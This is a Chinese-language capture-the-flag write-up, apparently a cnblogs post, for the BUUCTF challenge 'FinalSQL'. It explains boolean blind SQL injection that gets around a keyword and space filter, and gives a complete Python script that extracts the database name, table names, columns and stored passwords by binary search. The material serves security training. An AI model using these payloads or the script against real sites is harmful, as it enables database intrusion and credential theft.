zoukankan      html  css  js  c++  java
  • [极客大挑战 2019]FinalSQL

    考点

    SQL盲注
    bypass空格

    题解

    题目提示SQL盲注,过滤了很多关键词

    if mid like limit union and | & *  /**/ 空格
    

    输入 id=1^0 返回正确
    语句如下:
    0^(ascii(substr((select(database())),1,1))>102)
    ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))>mid
    若SQL语句为真则返回正常,为假则返回ERROR

    select(group_concat(schema_name))from(information_schema.schemata)

    二分法

    假设第一个字符的ASCII码为96
    
    low  high  mid
    32   126   81
    返回正常则为真,第一个字符的ASCII码大于81
    82   126   104
    返回ERROR则为假,第一个字符的ASCII码小于等于104
    82   104   93
    返回正常则为真,第一个字符的ASCII码大于93
    94   104   99
    返回ERROR则为假,第一个字符的ASCII码小于等于99
    94   99    96
    返回ERROR则为假,第一个字符的ASCII码小于等于96
    94   96    95
    返回正常则为真,第一个字符的ASCII码大于95
    96   96
    

    脚本如下

    import requests
    
    url = 'http://5d9d1cb2-97fb-46b6-87e2-0fd16174256b.node3.buuoj.cn/search.php?id=' 
    
    # geek
    def get_database():
        flag = ''
        for i in range(1, 50):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(database())),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    # F1naI1y,Flaaaaag
    def get_table():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    # F1naI1y: id,username,password
    # Flaaaaag: id,fl4gawsl
    def get_column():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                payload = f"0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{i},1))>{mid})"
    
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    
    def get_flag():
        flag = ''
        for i in range(1, 500):
            low = 32
            high = 126
            mid = (low+high)//2
            print(flag)
            while low < high:
                # payload = f"0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),{i},1))>{mid})"
                # payload = f"0^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})"
                payload = f"0^(ascii(substr(reverse((select(group_concat(password))from(F1naI1y))),{i},1))>{mid})"
                url_t = url + payload
                r = requests.get(url=url_t)
                
                if 'ERROR' in r.text:
                    high = mid
                if 'Click others' in r.text:
                    low = mid + 1
                mid = (low+high)//2
                
                if low == high:
                    flag = flag + chr(low)
                    break
    get_flag()
    
  • 相关阅读:
    Self Numbers
    【acdream】小晴天老师系列——竖式乘法
    全错位排列
    2 ^ x mod n = 1问题
    基于cocos2dx的横版动作游戏制作(二)
    基于cocos2dx的横版动作游戏制作(一)
    横版游戏制作之英雄技能CD遮罩,人物头像血条属性
    cocos2d横版游戏之摇杆控制
    C++ delete []p 数组指针,如何知道该数组大小的
    do { ....} while(0) 在宏里冗余的意义
  • 原文地址:https://www.cnblogs.com/peri0d/p/14077310.html
Copyright © 2011-2022 走看看